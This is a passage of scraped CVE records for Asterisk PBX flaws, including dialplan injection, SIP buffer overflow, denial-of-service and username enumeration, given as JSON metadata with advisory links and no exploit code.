          "url": "http://svn.asterisk.org/svn/asterisk/branches/1.2/README-SERIOUSLY.bestpractices.txt"
        },
        {
          "name": "39096",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/39096"
        },
        {
          "name": "1023637",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1023637"
        },
        {
          "name": "FEDORA-2010-3724",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037679.html"
        },
        {
          "name": "20100218 AST-2010-002: Dialplan injection vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/509608/100/0/threaded"
        },
        {
          "name": "38641",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/38641"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2010-002.html"
        },
        {
          "name": "ADV-2010-0439",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2010/0439"
        },
        {
          "name": "asterisk-dial-weak-security(56397)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56397"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2010-0685",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The design of the dialplan functionality in Asterisk Open Source 1.2.x, 1.4.x, and 1.6.x; and Asterisk Business Edition B.x.x and C.x.x, when using the ${EXTEN} channel variable and wildcard pattern matches, allows context-dependent attackers to inject strings into the dialplan using metacharacters that are injected when the variable is expanded, as demonstrated using the Dial application to process a crafted SIP INVITE message that adds an unintended outgoing channel leg.  NOTE: it could be argued that this is not a vulnerability in Asterisk, but a class of vulnerabilities that can occur in any program that uses this feature without the associated filtering functionality that is already available."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://svn.asterisk.org/svn/asterisk/branches/1.2/README-SERIOUSLY.bestpractices.txt",
              "refsource": "MISC",
              "url": "http://svn.asterisk.org/svn/asterisk/branches/1.2/README-SERIOUSLY.bestpractices.txt"
            },
            {
              "name": "39096",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/39096"
            },
            {
              "name": "1023637",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1023637"
            },
            {
              "name": "FEDORA-2010-3724",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037679.html"
            },
            {
              "name": "20100218 AST-2010-002: Dialplan injection vulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/509608/100/0/threaded"
            },
            {
              "name": "38641",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/38641"
            },
            {
              "name": "http://downloads.digium.com/pub/security/AST-2010-002.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.digium.com/pub/security/AST-2010-002.html"
            },
            {
              "name": "ADV-2010-0439",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2010/0439"
            },
            {
              "name": "asterisk-dial-weak-security(56397)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56397"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2010-0685",
    "datePublished": "2010-02-23T20:00:00",
    "dateReserved": "2010-02-22T00:00:00",
    "dateUpdated": "2024-08-07T00:59:38.329Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2019-12827

Vulnerability from cvelistv5

Published

2019-07-12 19:19

Modified

2024-08-04 23:32

Severity ?

Summary

Buffer overflow in res_pjsip_messaging in Digium Asterisk versions 13.21-cert3, 13.27.0, 15.7.2, 16.4.0 and earlier allows remote authenticated users to crash Asterisk by sending a specially crafted SIP MESSAGE message.

References

▼	URL	Tags
	https://issues.asterisk.org/jira/browse/ASTERISK-28447	x_refsource_CONFIRM
	http://downloads.digium.com/pub/security/AST-2019-002.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T23:32:55.236Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28447"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2019-002.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2019-06-14T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in res_pjsip_messaging in Digium Asterisk versions 13.21-cert3, 13.27.0, 15.7.2, 16.4.0 and earlier allows remote authenticated users to crash Asterisk by sending a specially crafted SIP MESSAGE message."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-07-12T19:19:52",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28447"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2019-002.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2019-12827",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in res_pjsip_messaging in Digium Asterisk versions 13.21-cert3, 13.27.0, 15.7.2, 16.4.0 and earlier allows remote authenticated users to crash Asterisk by sending a specially crafted SIP MESSAGE message."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-28447",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28447"
            },
            {
              "name": "http://downloads.digium.com/pub/security/AST-2019-002.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.digium.com/pub/security/AST-2019-002.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2019-12827",
    "datePublished": "2019-07-12T19:19:52",
    "dateReserved": "2019-06-14T00:00:00",
    "dateUpdated": "2024-08-04T23:32:55.236Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2007-4103

Vulnerability from cvelistv5

Published

2007-07-31 10:00

Modified

2024-08-07 14:46

Severity ?

Summary

The IAX2 channel driver (chan_iax2) in Asterisk Open 1.2.x before 1.2.23, 1.4.x before 1.4.9, and Asterisk Appliance Developer Kit before 0.6.0, when configured to allow unauthenticated calls, allows remote attackers to cause a denial of service (resource exhaustion) via a flood of calls that do not complete a 3-way handshake, which causes an ast_channel to be allocated but not released.

References

▼	URL	Tags
	http://www.securityfocus.com/bid/24950	vdb-entry, x_refsource_BID
	http://security.gentoo.org/glsa/glsa-200802-11.xml	vendor-advisory, x_refsource_GENTOO
	http://secunia.com/advisories/29051	third-party-advisory, x_refsource_SECUNIA
	http://bugs.gentoo.org/show_bug.cgi?id=185713	x_refsource_CONFIRM
	http://www.securitytracker.com/id?1018472	vdb-entry, x_refsource_SECTRACK
	http://www.vupen.com/english/advisories/2007/2701	vdb-entry, x_refsource_VUPEN
	http://www.securityfocus.com/archive/1/475069/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://securityreason.com/securityalert/2960	third-party-advisory, x_refsource_SREASON
	http://ftp.digium.com/pub/asa/ASA-2007-018.pdf	x_refsource_CONFIRM
	http://osvdb.org/38197	vdb-entry, x_refsource_OSVDB
	http://secunia.com/advisories/26274	third-party-advisory, x_refsource_SECUNIA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T14:46:38.776Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "24950",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/24950"
          },
          {
            "name": "GLSA-200802-11",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://security.gentoo.org/glsa/glsa-200802-11.xml"
          },
          {
            "name": "29051",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/29051"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://bugs.gentoo.org/show_bug.cgi?id=185713"
          },
          {
            "name": "1018472",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1018472"
          },
          {
            "name": "ADV-2007-2701",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2007/2701"
          },
          {
            "name": "20070729 ASA-2007-018: Resource exhaustion vulnerability in IAX2 channel driver",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/475069/100/0/threaded"
          },
          {
            "name": "2960",
            "tags": [
              "third-party-advisory",
              "x_refsource_SREASON",
              "x_transferred"
            ],
            "url": "http://securityreason.com/securityalert/2960"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://ftp.digium.com/pub/asa/ASA-2007-018.pdf"
          },
          {
            "name": "38197",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/38197"
          },
          {
            "name": "26274",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/26274"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-07-29T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The IAX2 channel driver (chan_iax2) in Asterisk Open 1.2.x before 1.2.23, 1.4.x before 1.4.9, and Asterisk Appliance Developer Kit before 0.6.0, when configured to allow unauthenticated calls, allows remote attackers to cause a denial of service (resource exhaustion) via a flood of calls that do not complete a 3-way handshake, which causes an ast_channel to be allocated but not released."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-15T20:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "24950",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/24950"
        },
        {
          "name": "GLSA-200802-11",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://security.gentoo.org/glsa/glsa-200802-11.xml"
        },
        {
          "name": "29051",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/29051"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://bugs.gentoo.org/show_bug.cgi?id=185713"
        },
        {
          "name": "1018472",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1018472"
        },
        {
          "name": "ADV-2007-2701",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2007/2701"
        },
        {
          "name": "20070729 ASA-2007-018: Resource exhaustion vulnerability in IAX2 channel driver",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/475069/100/0/threaded"
        },
        {
          "name": "2960",
          "tags": [
            "third-party-advisory",
            "x_refsource_SREASON"
          ],
          "url": "http://securityreason.com/securityalert/2960"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://ftp.digium.com/pub/asa/ASA-2007-018.pdf"
        },
        {
          "name": "38197",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/38197"
        },
        {
          "name": "26274",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/26274"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-4103",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The IAX2 channel driver (chan_iax2) in Asterisk Open 1.2.x before 1.2.23, 1.4.x before 1.4.9, and Asterisk Appliance Developer Kit before 0.6.0, when configured to allow unauthenticated calls, allows remote attackers to cause a denial of service (resource exhaustion) via a flood of calls that do not complete a 3-way handshake, which causes an ast_channel to be allocated but not released."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "24950",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/24950"
            },
            {
              "name": "GLSA-200802-11",
              "refsource": "GENTOO",
              "url": "http://security.gentoo.org/glsa/glsa-200802-11.xml"
            },
            {
              "name": "29051",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/29051"
            },
            {
              "name": "http://bugs.gentoo.org/show_bug.cgi?id=185713",
              "refsource": "CONFIRM",
              "url": "http://bugs.gentoo.org/show_bug.cgi?id=185713"
            },
            {
              "name": "1018472",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1018472"
            },
            {
              "name": "ADV-2007-2701",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2007/2701"
            },
            {
              "name": "20070729 ASA-2007-018: Resource exhaustion vulnerability in IAX2 channel driver",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/475069/100/0/threaded"
            },
            {
              "name": "2960",
              "refsource": "SREASON",
              "url": "http://securityreason.com/securityalert/2960"
            },
            {
              "name": "http://ftp.digium.com/pub/asa/ASA-2007-018.pdf",
              "refsource": "CONFIRM",
              "url": "http://ftp.digium.com/pub/asa/ASA-2007-018.pdf"
            },
            {
              "name": "38197",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/38197"
            },
            {
              "name": "26274",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/26274"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-4103",
    "datePublished": "2007-07-31T10:00:00",
    "dateReserved": "2007-07-30T00:00:00",
    "dateUpdated": "2024-08-07T14:46:38.776Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2017-14098

Vulnerability from cvelistv5

Published

2017-09-02 16:00

Modified

2024-08-05 19:20

Severity ?

Summary

In the pjsip channel driver (res_pjsip) in Asterisk 13.x before 13.17.1 and 14.x before 14.6.1, a carefully crafted tel URI in a From, To, or Contact header could cause Asterisk to crash.

References

▼	URL	Tags
	https://bugs.debian.org/873909	x_refsource_CONFIRM
	http://www.securitytracker.com/id/1039253	vdb-entry, x_refsource_SECTRACK
	http://downloads.asterisk.org/pub/security/AST-2017-007.html	x_refsource_CONFIRM
	http://www.securityfocus.com/bid/100583	vdb-entry, x_refsource_BID
	https://issues.asterisk.org/jira/browse/ASTERISK-27152	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T19:20:41.224Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugs.debian.org/873909"
          },
          {
            "name": "1039253",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1039253"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2017-007.html"
          },
          {
            "name": "100583",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/100583"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27152"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2017-09-02T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "In the pjsip channel driver (res_pjsip) in Asterisk 13.x before 13.17.1 and 14.x before 14.6.1, a carefully crafted tel URI in a From, To, or Contact header could cause Asterisk to crash."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-09-05T09:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugs.debian.org/873909"
        },
        {
          "name": "1039253",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1039253"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2017-007.html"
        },
        {
          "name": "100583",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/100583"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27152"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-14098",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "In the pjsip channel driver (res_pjsip) in Asterisk 13.x before 13.17.1 and 14.x before 14.6.1, a carefully crafted tel URI in a From, To, or Contact header could cause Asterisk to crash."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://bugs.debian.org/873909",
              "refsource": "CONFIRM",
              "url": "https://bugs.debian.org/873909"
            },
            {
              "name": "1039253",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1039253"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2017-007.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2017-007.html"
            },
            {
              "name": "100583",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/100583"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-27152",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27152"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-14098",
    "datePublished": "2017-09-02T16:00:00",
    "dateReserved": "2017-08-31T00:00:00",
    "dateUpdated": "2024-08-05T19:20:41.224Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2011-4597

Vulnerability from cvelistv5

Published

2011-12-15 02:00

Modified

2024-08-07 00:09

Severity ?

Summary

The SIP over UDP implementation in Asterisk Open Source 1.4.x before 1.4.43, 1.6.x before 1.6.2.21, and 1.8.x before 1.8.7.2 uses different port numbers for responses to invalid requests depending on whether a SIP username exists, which allows remote attackers to enumerate usernames via a series of requests.

References

▼	URL	Tags
	http://osvdb.org/77597	vdb-entry, x_refsource_OSVDB
	http://downloads.asterisk.org/pub/security/AST-2011-013.html	x_refsource_CONFIRM
	http://openwall.com/lists/oss-security/2011/12/09/4	mailing-list, x_refsource_MLIST
	http://openwall.com/lists/oss-security/2011/12/09/3	mailing-list, x_refsource_MLIST
	http://secunia.com/advisories/47273	third-party-advisory, x_refsource_SECUNIA
	http://archives.neohapsis.com/archives/bugtraq/2011-12/0151.html	mailing-list, x_refsource_BUGTRAQ
	http://www.debian.org/security/2011/dsa-2367	vendor-advisory, x_refsource_DEBIAN
	http://lists.digium.com/pipermail/asterisk-dev/2011-November/052191.html	mailing-list, x_refsource_MLIST

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T00:09:19.309Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "77597",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/77597"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2011-013.html"
          },
          {
            "name": "[oss-security] 20111209 Re: CVE Request -- Asterisk -- AST-2011-013 and AST-2011-014",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://openwall.com/lists/oss-security/2011/12/09/4"
          },
          {
            "name": "[oss-security] 20111209 CVE Request -- Asterisk -- AST-2011-013 and AST-2011-014",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://openwall.com/lists/oss-security/2011/12/09/3"
          },
          {
            "name": "47273",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/47273"
          },
          {
            "name": "20111222 Exploit for Asterisk Security Advisory AST-2011-013",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://archives.neohapsis.com/archives/bugtraq/2011-12/0151.html"
          },
          {
            "name": "DSA-2367",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2011/dsa-2367"
          },
          {
            "name": "[asterisk-dev] 20111108 Summary: SIP, NAT, security concerns, oh my!",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://lists.digium.com/pipermail/asterisk-dev/2011-November/052191.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2011-12-08T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The SIP over UDP implementation in Asterisk Open Source 1.4.x before 1.4.43, 1.6.x before 1.6.2.21, and 1.8.x before 1.8.7.2 uses different port numbers for responses to invalid requests depending on whether a SIP username exists, which allows remote attackers to enumerate usernames via a series of requests."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2012-09-01T09:00:00",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "77597",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/77597"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2011-013.html"
        },
        {
          "name": "[oss-security] 20111209 Re: CVE Request -- Asterisk -- AST-2011-013 and AST-2011-014",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://openwall.com/lists/oss-security/2011/12/09/4"
        },
        {
          "name": "[oss-security] 20111209 CVE Request -- Asterisk -- AST-2011-013 and AST-2011-014",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://openwall.com/lists/oss-security/2011/12/09/3"
        },
        {
          "name": "47273",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/47273"
        },
        {
          "name": "20111222 Exploit for Asterisk Security Advisory AST-2011-013",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://archives.neohapsis.com/archives/bugtraq/2011-12/0151.html"
        },
        {
          "name": "DSA-2367",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2011/dsa-2367"
        },
        {
          "name": "[asterisk-dev] 20111108 Summary: SIP, NAT, security concerns, oh my!",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://lists.digium.com/pipermail/asterisk-dev/2011-November/052191.html"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2011-4597",
    "datePublished": "2011-12-15T02:00:00",
    "dateReserved": "2011-11-29T00:00:00",
    "dateUpdated": "2024-08-07T00:09:19.309Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2013-5642

Vulnerability from cvelistv5

Published

2013-09-09 17:00

Modified

2024-08-06 17:15

Severity ?

Summary

The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x before 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an invalid SDP that defines a media description before the connection description in a SIP request.

References

▼	URL	Tags
	http://secunia.com/advisories/54534	third-party-advisory, x_refsource_SECUNIA
	http://osvdb.org/96690	vdb-entry, x_refsource_OSVDB
	http://downloads.asterisk.org/pub/security/AST-2013-005.html	x_refsource_CONFIRM
